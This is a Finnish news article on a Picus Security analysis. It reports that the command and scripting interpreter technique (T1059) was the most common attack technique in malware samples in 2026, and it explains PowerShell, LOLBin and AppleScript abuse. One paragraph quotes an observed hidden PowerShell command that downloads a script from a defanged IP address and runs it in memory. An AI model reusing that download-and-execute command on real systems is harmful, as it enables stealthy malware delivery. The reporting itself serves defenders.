Picus Security: Komento- ja skriptitulkki yleisin uhkien hyökkäyskeino
Picus Security on julkaissut analyysin, joka korostaa T1059-komento- ja skriptitulkkitunnisteen merkitystä kyberhyökkäyksissä. Tekniikkaa käytettiin 27 prosentissa tutkituista haittaohjelmanäytteistä vuonna 2026.

Kyberturvallisuusyritys Picus Security on analysoinut ja raportoinut yleisimmistä uhkien käyttämistä hyökkäystekniikoista. Yhtiön mukaan"{inline-style-removed}The Red Report 2026"{inline-style-added} -raportin jatkoanalyysi osoittaa, että T1059", Komento- ja skriptitulkki" -tekniikka oli merkittävin vuonna 2026, esiintyen 27 prosentissa lähes 1,1 miljoonasta tutkitusta haittaohjelmanäytteestä.
Tämä tekniikka mahdollistaa hyökkääjille haittaohjelmien ja komentosarjojen suorittamisen uhrin järjestelmissä hyödyntämällä natiiveja komentoja ja skriptimoottoreita kuten PowerShell ja Bash. Picus Securityn mukaan tätä hyödynnetään usein", Initial Access" -vaiheessa lataamaan haittaohjelmia tai suorittamaan ns. "living-off-the-land" (LOLBins) -hyökkäyksiä, jotka naamioituvat normaaleiksi järjestelmätoiminnoiksi.
Raportissa kuvataan esimerkkejä, joissa hyökkääjät ovat käyttäneet PowerShell-komentoja lataamaan ja suorittamaan haitallisia komentosarjoja suoraan muistiin. Yksi havaituista komennoista oli "powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('hxxp://185[.]73[.]125[.]8:80/a67'))"". Tämä komento suorittaa verkon yli ladatun skriptin huomaamattomasti, vähentäen havaitsemisen mahdollisuuksia.
Lisäksi analyysissä tuodaan esiin, miten T1059-tekniikkaa käytetään myös", Execution" - ja", Persistence" -vaiheissa. Esimerkiksi macOS-ympäristöissä hyökkääjät ovat käyttäneet AppleScriptiä asentaakseen haittaohjelmia ja varmistaakseen niiden pysyvyyden järjestelmässä ohittamalla suojauksia. Tekniikka korostaa tarvetta valvoa ja rajoittaa skriptitulkkejen käyttöä sekä tehostaa päätepisteiden suojausta.